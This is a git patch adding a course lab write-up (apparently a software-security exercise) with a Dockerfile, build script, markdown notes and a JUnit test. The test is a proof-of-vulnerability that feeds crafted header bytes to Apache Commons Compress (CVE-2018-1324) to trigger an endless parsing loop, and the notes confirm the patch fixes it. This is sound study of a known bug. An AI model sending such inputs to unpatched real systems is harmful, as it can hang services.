From e67fc55af30d6c1ac5be09783729c25d56911a6b Mon Sep 17 00:00:00 2001 From: Michael Chen Date: Wed, 15 Jun 2022 19:58:23 +0200 Subject: [PATCH] Added lab 4 writeup (WIP) --- Exercise/Writeup/Lab 04/Dockerfile | 4 +++ Exercise/Writeup/Lab 04/RCountLoopTest.java | 23 +++++++++++++++ Exercise/Writeup/Lab 04/build.sh | 2 ++ Exercise/Writeup/lab04.md | 32 +++++++++++++++++++++ 4 files changed, 61 insertions(+) create mode 100644 Exercise/Writeup/Lab 04/Dockerfile create mode 100644 Exercise/Writeup/Lab 04/RCountLoopTest.java create mode 100644 Exercise/Writeup/Lab 04/build.sh create mode 100644 Exercise/Writeup/lab04.md diff --git a/Exercise/Writeup/Lab 04/Dockerfile b/Exercise/Writeup/Lab 04/Dockerfile new file mode 100644 index 0000000..4e60243 --- /dev/null +++ b/Exercise/Writeup/Lab 04/Dockerfile @@ -0,0 +1,4 @@ +FROM bqcuongas/sselab:latest + +# Copy Task 3 Tests to Image +COPY RCountLoopTest.java /SSE_LAB/CVE-2018-1324/src/test/java/org/apache/commons/compress/archivers/zip/ \ No newline at end of file diff --git a/Exercise/Writeup/Lab 04/RCountLoopTest.java b/Exercise/Writeup/Lab 04/RCountLoopTest.java new file mode 100644 index 0000000..f9b248b --- /dev/null +++ b/Exercise/Writeup/Lab 04/RCountLoopTest.java @@ -0,0 +1,23 @@ +package org.apache.commons.compress.archivers.zip; +import org.junit.Test; + +public class RCountLoopTest { + @Test(timeout = 5000) + public void rCountLoopPoVTest() { + X0017_StrongEncryptionHeader header = new X0017_StrongEncryptionHeader(); + byte[] data = { + /* [0] Format */ 0,0, + /* [2] Algorithm */ 0,0, + /* [4] Bitlen */ 0,0, + /* [6] Flags */ 0,0, + /* [8] RCount (Outer Loop) */ -1,-1,-1,-1, + /* [12] HashType */ 0,0, + /* [14] HashSize (inner loop) */ -1,-1 + }; + int offset = 0; + int length = 0; + // System.err.println(String.format("ZIP RCount is '%d'!", ZipLong.getValue(data, 8))); + // System.err.println(String.format("ZIP HashSize is '%d'!", ZipShort.getValue(data, 14))); + header.parseCentralDirectoryFormat(data, offset, length); + } +} \ No newline at end of file diff --git a/Exercise/Writeup/Lab 04/build.sh b/Exercise/Writeup/Lab 04/build.sh new file mode 100644 index 0000000..8d0833b --- /dev/null +++ b/Exercise/Writeup/Lab 04/build.sh @@ -0,0 +1,2 @@ +#!/bin/sh -e +docker build -f Dockerfile -t hub.cnml.de/sselab:latest . \ No newline at end of file diff --git a/Exercise/Writeup/lab04.md b/Exercise/Writeup/lab04.md new file mode 100644 index 0000000..eba2f0f --- /dev/null +++ b/Exercise/Writeup/lab04.md @@ -0,0 +1,32 @@ +# Lab 4 + +## Task 2 + +The test that reveals the vulnerability is. + +```bash +# Run the newly created PoV +$ mvn test -e -Dtest=SupportDTDDefaultsTest#testDTDAttempt +SupportDTDDefaultsTest.testDTDAttempt:20 Should not try to resolve external DTD subset: java.io.IOException: java.net.ConnectException: Connection refused (Connection refused) +``` + +After introducing the patch the PoV disappeared. + +## Task 3 + +For this vulnerability we added additonal test that acts as a PoV to the docker image. + +```bash +# Run all tests +$ mvn test + +# Run only the newly created PoV +$ mvn test -e -Dtest=RCountLoopBug#rCountLoopPoVTest +RCountLoopTest.rCountLoopPoVTest:21 ยป TestTimedOut test timed out after 5000 m... +``` + +```bash +# Re-apply patch (revert patch is staged) +$ git restore --staged src/ +$ git restore src/ +``` \ No newline at end of file